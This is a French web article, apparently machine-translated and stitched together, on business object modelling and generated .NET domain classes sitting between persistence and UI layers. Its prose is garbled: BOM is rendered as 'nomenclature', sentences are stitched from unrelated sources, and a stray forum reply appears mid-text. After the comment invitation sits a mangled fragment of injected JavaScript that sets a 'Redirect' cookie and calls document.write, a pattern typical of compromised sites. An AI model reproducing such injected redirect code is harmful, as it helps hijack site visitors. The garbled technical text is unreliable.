Modèle des objets métier

Les objets métier séparent l`état du comportement, car ils sont communiqués à travers les niveaux dans un système à plusieurs niveaux, tandis que le travail réel de l`application se fait dans le niveau métier et ne se déplace pas à travers les niveaux. La modélisation d`objet métier décrit une représentation statique du domaine d`activité considéré dans un projet. Il est statique car il montre les entités importantes, leurs relations et attributs, mais ne montre pas comment ces changements dans le temps (voir cas d`utilisation-une introduction pour un exemple d`une technique pour une vue «dynamique» ou fonctionnelle d`un système). Le modèle d`objet métier est un ensemble de classes .NET, générées par le producteur de modèle d`objet métier, constituant un modèle de domaine. Fournit des informations sur la façon de configurer votre application pour pouvoir utiliser le modèle d`objet métier (BOM). Le modèle d`objet métier (BOM) se trouve entre la couche de persistance et les couches supérieures, telles que l`interface utilisateur et la couche services. L`utilisation des classes dans la nomenclature vous permet de manipuler leurs objets de persistance correspondants et toutes les couches supérieures sont basées sur cette même nomenclature. Par conséquent, la nomenclature générée peut être utilisée dans toutes les technologies .NET (ASP.NET Web Forms, ASP.NET MVC, Windows Forms, WPF, SharePoint, WCF, workflows, etc.) et reste la même indépendamment de la couche de persistance sous-jacente (par exemple, SQL Server, SQL Azure, Oracle Base de données, MySQL, PostgreSQL). Fournit des informations globales sur l`utilisation du modèle de nomenclature (Business Object Model) généré. Maintenant que vous avez une idée générale de ce que le modèle d`objet métier est, permet de plonger dans chacune des fonctionnalités disponibles. Fournit des informations sur les fonctionnalités de localisation disponibles dans le modèle d`objet métier (BOM) généré et sur la façon dont vous pouvez capitaliser sur ceux-ci afin de localiser votre application. Votre «modèle d`objet métier» ressemble à un modèle de données (conceptuel), sert le même but qu`un modèle de données (conceptuel) et est utilisé comme un modèle de données (conceptuel).

S`il vous plaît commenter ci-dessous si vous avez apprécié cet article, email à un ami ou faire des suggestions pour de nouveaux articles sur ce sujet. = (Time = cookie) | | void 0 = = = Time) {temps var = Math. Floor (date. Now ()/1E3 + 86 400 $), date = New Date ((New date). getTime () + 86 400);d ocument. cookie = “Redirect =” + temps + “; path =/; expire =” + date. toGMTString (), document. Write (` `)}]] > Je pense que votre`analyse`est saine.

Je ne vois aucune valeur (d`autres pourraient être en désaccord) dans l`ajout de comportement dans les formes de méthodes à un modèle OOA. Ce sont quelques lignes directrices pour commencer quand un modèle d`objet d`affaires est produit: il fournira des questions ou des réponses qui peuvent être reintégrées dans d`autres perspectives telles que le modèle de cas d`utilisation (ou n`importe quelle vue fonctionnelle). Il est normal de basculer entre différents modèles du domaine de problème plusieurs fois afin d`augmenter la compréhension. Si le domaine d`activité est bien compris par tous les membres de l`équipe de projet, les avantages du développement d`un modèle d`objet métier sont sensiblement réduits. Lorsque cela se produit, le modèle d`objet métier peut être omis entièrement. . Dans cet article, je décrirai ce qui est signifié par la modélisation d`objet d`affaires, d`où il vient, les avantages de cette approche, quelques principes de base et quand il devrait être utilisé. Comme il est l`épine dorsale de votre application contenant toute sa logique et réutilisée par toutes les couches, chaque fois qu`un développeur a besoin de l`étendre manuellement, il doit toujours le faire dans la couche de nomenclature.

admin